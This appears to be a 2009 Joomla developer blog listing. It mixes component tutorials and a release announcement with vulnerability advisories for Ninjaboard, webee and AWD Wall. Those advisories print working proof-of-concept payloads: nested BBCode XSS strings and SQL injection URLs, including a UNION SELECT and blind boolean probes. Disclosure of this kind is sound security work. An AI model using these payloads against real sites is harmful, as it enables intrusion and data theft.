Ninjaboard 0.5.0beta Multiple Vulnerabilities

Posted in Joomla!
2009-11-15 05:00:00 +0000 UTC

The Joomla component Ninjaboard 0.5.0beta suffers from multiple persistent XSS vulnerabilities in its BBCode implementation, as well as a minor CSRF vulnerability and a minor Path Disclosure vulnerability.

  1. XSS 1: Nested [img] Tags

    [img] [img] onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img]
  2. XSS 2: JavaScript links


    Requires minimal user interaction

  3. XSS 3: CSS Injection

  4. XSS 4: Nested [url] Tags

    Requires minimal user interaction, displays indications of malware, but still technically exploitable.

    [url][url] onmousemove=javascript:alert(String.fromCharCode(88,83,83));//[/url][/url]
  5. CSRF: [img] Tags

  6. Path Disclosure: Profile View 'id' parameter

    Passing non-numeric values for the 'id' parameter of the profile page results in a Fatal Error, which reveals the full path to components/com_ninjaboard/models/profile.php.


These issues are fixed in the latest release, and users are urged to upgrade.


webee 1.1.1 Multiple Vulnerabilities

Posted in Joomla!
2009-11-15 05:00:00 +0000 UTC

webee 1.1.1, a Joomla commenting plugin, suffers from multiple vulnerabilities.

  1. SQL Injection

    The 'articleId' is not sanitized.
    index2.php?option=com_webeecomment&task=default&articleId=999 union select 1,2,VERSION(),4,5,6,7,8,9,10,11,12 -- 
  2. [img] BBCode [color] Tag XSS

  3. [url] BBCode [img] Tag XSS

  4. [size] BBCode [url] Tag XSS


UPDATE: webee has been updated to 1.2 as of 12 November 2009 and still suffers from SQL Injection. XSS was not tested in 1.2


Joomla Commentator 1.1b3 Admin XSS Vulnerability

Posted in Joomla!
2009-11-15 05:00:00 +0000 UTC

Joomla Commentator 1.1b3, a Joomla commenting plugin, suffers from an XSS vulnerability in its "title" field that enables attackers to possibly run scripts as an administrator.



JMyLife 1.0 Released

Posted in Joomla!
2009-11-08 23:56:01 +0000 UTC

I am proud to announce the release of JMyLife 1.0, a new Joomla component by yours truly! JMyLife aims to replicate the functionality of in a Joomla 1.5 native component!

There are 2 versions available: JMyLife 1.0 FREE, which has the bare essentials, and JMyLife 1.0 Pro, with all the bells and whistles!

View the demo here - JMyLife Component Demo.

Overview of Features

  Free Pro
Guest Story Submission Yes Yes
User Comment Submission Yes Yes
Story Voting Yes Yes
Story Moderation Yes Yes
Comment Moderation Yes Yes
Built-in "Share on Facebook" Link Yes Yes
User Comment Reporting Yes Yes
reCAPTCHA on Submission Form No Yes
User Favorites No Yes
Community Builder Support No Yes
Submission Module No Yes
Category Menu Module No Yes
Story/Comment Search Plugin No Yes
Cost: FREE $20

When you purchase the Pro version, ALL minor updates (until 1.1) will be included, and you will be supporting future development of this project.

Menuitem Select in a Custom Component View

Posted in Joomla!
2009-11-07 04:55:18 +0000 UTC

I was doing some restructuring to my soon-to-be-released Joomla component, JMyLife, and wanted to have a slect item in the configuration view in order to allow the admin to select a page to direct users to as a "sign up" page. I originally had this item as part of the global view parameters, but I was having issues with Menu Items overriding the global values on specific views. I started digging through the Joomla API documents, expecting to find a simple JHTML statement I could use to produce this form element, but couldn't. I ended up with a solution that works, though I wish it were a bit easier.

Open Joomla Modal With Javascript

Posted in Joomla!
2009-10-29 14:34:09 +0000 UTC

As part of a recent project, I needed to open a modal window using Javascript. Here's how I did it.

Install Multiple Joomla Extensions in a Single Package

Posted in Joomla!
2009-10-24 19:47:38 +0000 UTC

Lately in my spare time, I've been working on a new Extension collection for my new site, I Hate My Neighbors. I'm planning on releasing this one as a commercial component soon, and as such I wanted to make sure the install process was as simple as possible. Since the component has some plugins and modules that go along with it, I decided it should go ahead and install everything from a single package. Here's how I did it.

JS Jobs Search Plugin

Posted in Joomla!
2009-10-24 19:32:31 +0000 UTC

Not too long ago a client of mine wanted to have entries from JS Jobs show up in the general Joomla search results. I went ahead and wrote up this quick and dirty search plugin for JS Jobs.

AWD Wall 1.5 Blind SQL Injection Vulnerability

Posted in Joomla!
2009-10-16 05:19:48 +0000 UTC

The Joomla component AWD Wall 1.5 suffers from an SQL Injection vulnerability in its handling of the 'cbuser' parameter.

?option=com_awdwall&view=awdwall&cbuser=62 and 1=1 limit 1 -- '
?option=com_awdwall&view=awdwall&cbuser=62 and 1=2 limit 1 -- '

Joomla Issues with Subdomains

Posted in Joomla!
2009-09-24 23:24:16 +0000 UTC

While working on a Joomla! site lately, I had an interesting issue arise. None of my scripts or CSS styles would load on a Joomla site installed on a subdomain. Luckily I was able to solve this quickly.